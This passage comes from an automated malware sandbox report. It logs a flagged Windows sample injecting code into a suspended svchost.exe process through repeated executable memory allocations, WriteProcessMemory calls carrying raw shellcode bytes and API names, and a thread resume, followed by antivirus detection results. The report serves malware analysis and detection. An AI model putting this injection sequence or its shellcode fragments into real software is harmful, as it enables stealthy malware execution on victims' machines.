NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1

Potential code injection by writing to the memory of another process (50 out of 474 events)

Time & API	Arguments	Status	Return
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGXMD$\D$\øMuWHw`HkFWHD$PHD$PH=¸u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\=Ç3ÀéZÿÿÿHD$PH=uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PH=uLF HNHVÿëÊÿëÆHD$PHøWuHNÿë³HD$PH=®EÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff2c246c process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: KERNEL32.dll base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: oåvF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: InitializeCriticalSection base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: Sleep base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: GetLastError base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: CreateThread base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: DeleteCriticalSection base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: GetFileSize base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: SetLastError base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: CreateFileA base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: lstrlenA base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: lstrcmpA base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: LoadLibraryA base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: GetTickCount base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: AreFileApisANSI base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ReadFile base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!wwG base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: TryEnterCriticalSection base_address: 0x0000000000460000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: 6ævävF base_address: 0x0000000000470000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 5332 resumed a thread in remote process 3180
NtResumeThread April 8, 2021, 9:16 a.m.	thread_handle: 0x0000000000000414 suspend_count: 1 process_identifier: 3180	1	0	0

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
FireEye	Generic.mg.2939f396d5b175b2
McAfee	Artemis!2939F396D5B1
Sangfor	Trojan.Win32.Save.a
APEX	Malicious
Avast	FileRepMalware
Kaspersky	UDS:DangerousObject.Multi.Generic
Paloalto	generic.ml
McAfee-GW-Edition	BehavesLike.Win32.Generic.hc
SentinelOne	Static AI - Malicious PE
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Microsoft	Program:Win32/Wacapew.C!ml
Cynet	Malicious (score: 100)
Acronis	suspicious
BitDefenderTheta	Gen:NN.ZexaF.34670.Hq0@a4hXcMck
Rising	Malware.Heuristic!ET#85% (RDMK:cmRtazqgcE3/aQH9SzUIXm6g7WK9)
eGambit	Unsafe.AI_Score_70%
AVG	FileRepMalware
CrowdStrike	win/malicious_confidence_90% (W)

Executed a process and injected code into it, probably while unpacking (50 out of 808 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 8, 2021, 9:15 a.m.	thread_identifier: 4836 thread_handle: 0x000000a0 process_identifier: 7236 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\cmd.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x000000a4	1	1
CreateProcessInternalW April 8, 2021, 9:15 a.m.	thread_identifier: 8104 thread_handle: 0x000000a4 process_identifier: 5332 current_directory: C:\Windows\system32 filepath: track: 1 command_line: C:\Windows\system32\wermgr.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x000000a0	1	1
CreateProcessInternalW April 8, 2021, 9:16 a.m.	thread_identifier: 4420 thread_handle: 0x0000000000000414 process_identifier: 3180 current_directory: filepath: track: 1 command_line: C:\Windows\system32\svchost.exe filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000090000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWkGXMD$\D$\øMuWHw`HkFWHD$PHD$PH=¸u\HFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëpD$\=Ç3ÀéZÿÿÿHD$PH=uPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PH=uLF HNHVÿëÊÿëÆHD$PHøWuHNÿë³HD$PH=®EÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HÇHOÿW(HÇG3ÉÿW83ÀHå[_^A^]ÃÌÌUVHì(Hl$ HäðHuPHöt@HEHM@HVpLFxLÉHHH¶HNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000090000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000000a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: ,ëv +æv/æv Ùävð@wÀ/!w0!ww base_address: 0x00000000000a0000 process_identifier: 3180 process_handle: 0x000000000000041c	1	1
WriteProcessMemory April 8, 2021, 9:16 a.m.	buffer: H¹ H¸ ÿà base_address: 0x00000000ff2c246c process_identifier: 3180 process_handle: 0x000000000000041c	1	1
NtResumeThread April 8, 2021, 9:16 a.m.	thread_handle: 0x0000000000000414 suspend_count: 1 process_identifier: 3180	1	0
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 1138688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x000000000000041c	1	0
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 4 (PAGE_READWRITE) base_address: 0x0000000180000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x000000000000041c	1	0
NtAllocateVirtualMemory April 8, 2021, 9:16 a.m.	process_identifier: 3180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000041c	1	0
